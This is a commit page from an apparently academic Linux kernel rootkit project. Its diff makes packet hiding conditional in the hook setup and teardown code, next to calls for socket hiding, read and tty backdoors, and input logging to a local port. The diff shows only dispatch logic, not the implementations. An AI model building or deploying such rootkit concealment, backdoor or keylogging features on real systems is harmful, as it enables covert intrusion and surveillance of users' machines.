adds packet hiding to hook_init - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 19f24a7529b76bc8361e5271c5b7f1e8544e6cb9
parent 10b6003da5e1cd098ed4ffb88816cb756ba8f02f
Author: deurzen <m.deurzen@tum.de>
Date:   Sat, 19 Dec 2020 23:50:12 +0100

adds packet hiding to hook_init

Diffstat:
M src/hook.c  | 10 ++++++----

1 file changed, 6 insertions(+), 4 deletions(-)
diff --git a/src/hook.c b/src/hook.c
@@ -88,6 +88,9 @@ init_hooks(void)
     if (rootkit.hiding_sockets)
         hide_sockets();
 
+    if (rootkit.hiding_packets)
+        hide_packets();
+
     if (rootkit.backdoor == BD_READ)
         backdoor_read();
     else if (rootkit.backdoor == BD_TTY)
@@ -95,8 +98,6 @@ init_hooks(void)
 
     if (rootkit.logging_input)
         log_input("127.0.0.1", "5000");
-
-    hide_packets();
 }
 
 void
@@ -119,13 +120,14 @@ remove_hooks(void)
     if (rootkit.hiding_sockets)
         unhide_sockets();
 
+    if (rootkit.hiding_packets)
+        unhide_packets();
+
     if (rootkit.backdoor != BD_OFF)
         unbackdoor();
 
     if (rootkit.logging_input)
         unlog_input();
-
-    unhide_packets();
 }
 
 void

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs